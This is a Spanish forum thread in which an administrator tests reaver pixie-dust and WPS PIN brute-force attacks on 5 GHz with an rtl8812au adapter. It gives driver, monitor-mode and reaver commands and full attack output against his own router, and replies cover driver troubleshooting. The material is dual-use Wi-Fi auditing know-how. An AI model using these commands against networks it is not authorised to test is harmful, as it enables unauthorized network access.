El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 02-02-2017 23:43:10

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,529

Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

Reaver en banda 5Ghz con chipset WiFi Realtek rtl8122au:
¡Entrad en la edad del crack WPS "ac"!

crack_wps_5ghz_rtl8812au_4.jpg

¡Buenos días [email protected] smile !
  Si sigues de cerca la trepidante y tumultuosa vida de tu foro favorito, tongue no te habrá escapado esta noticia (perdón: Este notición): ¡Notición! ¡Inyección con AWUS036ACH! ¡La revolución está en marcha!
   La AWUS036ACH lleva un chipset wifi Realtek rtl8812au (lo podemos encontrar en otros adaptadores). 
   Es un chipset "doble bandas":  b/g/n (frecuencias 2.4 Ghz) y ac (frecuencias 5 Ghz)
   Hasta hace poco este chipset no tenía drivers capaces de inyectar correctamente el trafico.
    Se podía poner en modo monitor pero no se podía inyectar bien.
  Sin inyección de trafico estamos reducido a hacer hacking wifi en modo "espectadores": abrir airoduimp-ng para esperar que se conecte un cliente para pillar un hadshake (sin DoS), mandar un PIN en modo managed para ver si es bueno (sin poder hacer un brute force con reaver)...
  No es ni divertido, ni eficaz.

  Disponemos ahora (ver primer link) de unos drivers desarrollados astsam que permiten inyectar trafico.
He podido comprobar que funcionan bien con reaver en banda b/g/n, quedaba por averiguar cómo se portan en banda 5Ghz...
  Hay dos desconocidas en este asunto:
    Ver que tal va el driver en banda 5Ghz
   - Y ver que tal va... reaver en banda 5Ghz.
Porqué hasta hora nunca he podido probar seriamente reaver en banda 5Ghz 
Hasta la llegada del rtl8812a (y sobre todo de los drivers de astsam), lo que teníamos para auditorias en banda "a" eran los chipset Ralink USB (RT3570, RT3572 y un par más)
Existe también un chipset USB de Atheros, el ar9170, que debería inyectar el trafico en banda 5gh, pero.hace mucho tiempo que no se produce y que no he visto uno. 
  El problema con los chipsets Ralink es que no van bien con Reaver (en banda 2.4Ghz y en banda 5Ghz, no es cuestión de frecuencias)
     El resultado es que (hasta los drivers de astsam) no se podía hacer un ataque brute force WPS en banda 5Ghz y no se podía tirar de reaver en estas frecuencias.
  Podéis ver en este tema " Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)" que se deben hacer bastantes maniobras para hacer un simple ataque pixie dust 

  Estos días oscuros terminaron. smile
Era hora de salir la edad media y entrar en la edad del hacking WPS "ac"
  Les enseño enseguida los resultados obtenidos con reaver 1.5.2 (reaver mod' para pixie dust)  y una AWUS036ACH (con su chipset rtl8812au) haciendo una sesión de crack WPS en banda 5Ghz.
   Lo hago con Kali Linux (actualizado). He probado también con Ubuntu 16.10 y es igual. 
 

Modo monitor

Quizá es bueno recordar que se deben instalar los famosos drivers de astsam:

git clone https://github.com/astsam/rtl8812au.git && cd rtl* && make && sudo make install

     
  De momento airmon-ng no puede pasar el chipset en modo monitor por lo tanto se debe hacer con iwconfig.
Es necesario deshabilitar network manager para no tener conflictos entre modo monitor y modo managed.
   - Para desactivar network manager:

sudo systemctl stop NetworkManager.service

   - Luego pasamos el modo monitor (usaré la interfaz wlan1, adaptar a vuestro caso)

sudo ifconfig wlan1 down
sudo iwconfig wlan1 mode monitor
sudo ifconfig wlan1 up

   Se puede verificar con iwconfig
El valor de la potencia (12dBm) está erróneo, no corresponde con la realidad.
  Desgraciadamente de momento no hay control de la potencia con estos drivers. .
  Diría que está en 20dBm

Escaneo

El escaneo con wash funciona bien y podemos ver que hace un barrido de todos los canales en las frecuencias 5Ghz

crack_wps_5ghz.jpg

.
Hay tres "bugs" con wash

  1. El primero es realmente poca cosa: Podéis ver en la captura de pantalla que antes de ir en los canales 5Ghz (opción -5 de wash)  hecha un ojo el canal 1  en 2.4 Ghz). Un pequeño residuo conflictivo o una pequeña latencia propia a wash en estas frecuencias...

  2. Cómo en el caso de los ralink no sale el valor de la intensidad de señal

  3. El otro bug me ha hecho volverme loco y no se puede ver en consola... No sale mi PA y estoy a tres metros...¿Por qué?

Explicación:
Miramos que pasa con airodump-ng escaneando este canal (36)

crack_wps_5ghz_2_20170202-2307.jpg

  Sale mi PA, pero en el canal -1 tongue
Los valores de los canales son exactos menos cuando el nivel de señal es excelente.
wash lo descarta y no lo enseña mientras que airodump-ng lo pone en el canal -1.   
  Da gusto ver RXQ perfectos o casi con señales por debajo de los 80dm: Significa que podemos hacer gran cosas con señales flojas... cool
Es mejor entonces de momento usar airdoump-ng con el parámetro --wps en lugar de wash para el escaneo WPS en frecuencias de 5Ghz.

Pixie dust

En versión corta: ¡De diez! cool

crack_wps_5ghz_rtl8812au_3.jpg

Ha sido darle a <Enter> y tener la llave enseguida.
  No llegaron a ser dos segundos. (estoy a dos metros del routeur)

Brute force

  Mi router tiene bloqueo del WPS y no hay forma de desactivarlo desde la interfaz de gestión.
  Así que se probaran 10 PINes.   
Bastante para hacer se una idea de que tal va.
Y otra vez: ¡De diez!
  10 Pines mandados y comprobados a toda velocidad sin un solo error:
Les dejo el stdout completo de la secuencia:

[email protected]:~$ sudo reaver -i wlan1 -b 00:C0:CA:85:32:E2 -d 1 -vv -c 36

Reaver v1.5.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

[+] Switching wlan1 to channel 36
[?] Restore previous session for 00:C0:CA:85:32:E2? [n/Y] y
[+] p1_index set to 1
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from 00:C0:CA:85:32:E2
[+] Associated with 00:C0:CA:85:32:E2 (ESSID: wifilibre5ghz)
[+] Starting Cracking Session. Pin count: 1, Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 3
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 4
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 5
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] Trying pin 33335674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 6
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] Trying pin 44445676.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 7
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] 0.06% complete. Elapsed time: 0d0h0m9s.
[+] Trying pin 55555678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 8
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] Trying pin 66665670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 9
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 10
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

  Si no fuera por el "AP rate limiting" lo hubiera dejado el tiempo necesario para encontrar la llave...
  El rendimiento está a la altura de mis expectativas (exigencia máxima):  Tengo la sencación de usar reaver en la banda 5Ghz como si fuera con un rtl8187l en banda 2.4 Ghz (lo mejor para esto)
   O debería decir ahora como si fuera en banda 2,4 Ghz con una AWUS036ACH tongue
 

El veredicto

 
  Es con mucho gusto que puedo afirmar que el rtl8182au es de los mejores chipset que haya para auditarias WPS.
Y es el unico chipset WIFI USB capaz de hacer lo con un alto rendimiento en ambas bandas
  Con este chipset podemos por fin disfrutar de reaver en banda 5 Ghz con un rendimiento optimó.
    Y estos pequeños bugs con wash sin importancia no van a aguar la fiesta.
  Desde lo más profundo del corazón de los hombres se puede oír un murmuro que sube lentamente hasta trasformarse en un grito animal liberador

¡Gloría al  Monstruo del Espagueti Volador!
¡Hemos entrado en la edad del crack WPS "ac"!

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 03-02-2017 00:24:21

dymusya
Very Important Usuario

Registrado: 19-04-2015
Mensajes: 174

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

Que ganas de poner manos a la obra con este bicho, gracias por compartir, amigo

Desconectado

#3 04-02-2017 01:18:33

Flashed
Usuario

Registrado: 03-10-2016
Mensajes: 85

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

Pinta muy bien esa nueva obra maestra. Quizá caiga uno pronto xD
Por lo demás, muy buena guía, saludos!

Desconectado

#4 22-03-2017 03:28:53

Wifree
Expulsado

Registrado: 22-03-2017
Mensajes: 1

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

Hola, en la segunda cita que pones, me da esa misma respuesta y me temo que eso está fallando, te lo cito para que no haya dudas:

[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000

Por mas que lo hubieras puesto con delay, creo que no habría funcionado.
Un saludo.

Desconectado

#5 22-03-2017 10:02:09

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,529

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

big_smile
No está fallando, todo lo contrario...
  He probado el PIN 00005678.
No es el PIN del dispositivo.
Ves que recibo un M4 seguido por un NACK y que mi cuenta adelanta : p1_index set to 2.
Significa que he comprobado una  primera mitad  (p1_index ) y no es la buena. El indice pasa de 1 a 2.
Al final de la secuencia he comprobado 10 primeras mitades de Pines:

[+] Trying pin 77775672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] p1_index set to 10
[+] Pin count advanced: 10. Max pin attempts: 11000

Un éxito completo, 100% de eficiencia, diez de diez cool  He comprobado 10 pirmeras mitades de PIN con diez intentos
Para aclarar las cosas: Guía completa para principiantes "Crack WPS con reaver"
Saludos y bienvenido al foro  smile

Desconectado

#6 23-03-2017 20:56:11

calavazo32
Usuario

Registrado: 23-03-2017
Mensajes: 19

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

¿tiene que ser 32 bits o 64 bits?
en kali linux he probado las 2 versiones y no compila el driver asi que voy a hacerlo en ubuntu pero no se si funciona con 32 bits o 64 bits

Desconectado

#7 23-03-2017 21:25:52

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,529

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

El driver no es para una arquitectura en concreto, vale para ambas.
El driver compila... Algo haces mal wink
Las preguntas sobre instalación del driver en Kali se hacen aquí: Instalación rtl8812au (Alfa AWUSO36ACH) en kali linux "rolling" 2016.2
Debes enseñar lo que pasa en consola, sino no podemos saber que pasa.

Desconectado

#8 24-03-2017 00:01:05

calavazo32
Usuario

Registrado: 23-03-2017
Mensajes: 19

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

ya he conseguido que funcione en ubuntu, por cierto ¿se sabe si aireplay-ng funciona en 5 ghz? ¿o tendria que ser con mdk3? quiero capturar algun handshake en 5ghz pero aireplay-ng da error de canal negativo -1, uso el comando "--ignore-negative-one" pero sigue sin detectar el AP

Desconectado

#9 24-03-2017 15:54:16

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,529

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

Si se puede usar reaver en banda 5Ghz es que se inyecta correctamente en banda 5Ghz, reaver requiere sí o sí inyección de paquetes.  wink
Tus preguntas no tienen que ver con crack WPS así que no voy a responderte aquí sobre lo que no tiene que ver con el crack WPS
Si quieres hablar de otras cosa  abres un tema nuevo o colocas tu pregunta en un hilo sobre el mismo tema en el foro adecuado.
Tienes a un foro entero dedicado a la captura del handshake wink : Captura del handshake y preguntas generales
Para verificar que un dispositivo inyecta correctamente (es necesario para usar reaver) haz un test de inyección

aireplay-ng -9

Fijas el adaptador en el canal que quieres
Lo haces abriendo una consola con airodump-ng en el canal de la banda 5Ghz que quieres comprobar o bien lo haces fijando el canal con iwconfig antes de habilitar el modo monitor.
Si no hay inyección no funcionan correctamente ni mdk3,  ni airpelay-ng, ni reaver.
Veo por lo de "channel -1" que no has instalado la última versión del driver: (     ¡Notición! ¡Inyección con AWUS036ACH! ¡La revolución está en marcha!)

Desconectado

#10 24-03-2017 22:33:44

calavazo32
Usuario

Registrado: 23-03-2017
Mensajes: 19

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

con airodump-ng en ubuntu me va perfecto y aireplay-ng y reaver inyectan paquetes, pero sale el canal negativo -1 mi tarjeta wifi es el tp link archer t4u, estuve mirando el chipset y tiene el RTL8812AU, aunque tambien vi varios drivers que afirman tener modo monitor con este chipset ¿que diferencia hay entre este driver y los demas? los drivers son estos:
_________________________________________________________________________________________________________________
https://github.com/diederikdehaas/rtl8812AU
https://github.com/abperiasamy/rtl8812AU_8821AU_linux
https://github.com/gnab/rtl8812au
_________________________________________________________________________________________________________________

¿es posible que solo el driver de astsam soporte modo monitor o porque es el mas estable?

Desconectado

#11 24-03-2017 22:52:53

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,529

Re: Reaver banda 5Ghz con rtl8122au: ¡Entrad en la edad del crack WPS ac!

Estas preguntas tampoco tienen que ver con crack WPS con reaver en banda 5Ghz. big_smile
Además todo lo que preguntas está explicado en el primer mensaje del hilo que acabo de indicarte.
Lea el primer post de dicho tema (https://www.wifi-libre.com/topic-689-no … html#p5408)   
Si algo no te queda claro haz tu pregunta en el hilo adecuado.
Puedes abrir un tema nuevo si prefieres.
Pero las preguntas sobre drivers no van en el foro crack WPS.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
4 229 Ayer 20:21:00 por Betis-Jesus
0 88 13-11-2018 16:13:33 por kcdtv
0 84 12-11-2018 18:16:07 por kcdtv
35 26308 12-11-2018 15:36:56 por kcdtv
Hola a todos por fractalia
7 199 12-11-2018 14:32:06 por fractalia

Pie de página

Información del usuario

Ultimo usuario registrado: KiViEr
Usuarios registrados conectados: 0
Invitados conectados: 8

Estadisticas de los foros

Número total de usuarios registrados: 1,274
Número total de temas: 1,224
Número total de mensajes: 12,538

Máx. usuarios conectados: 74 el 13-11-2018 18:47:20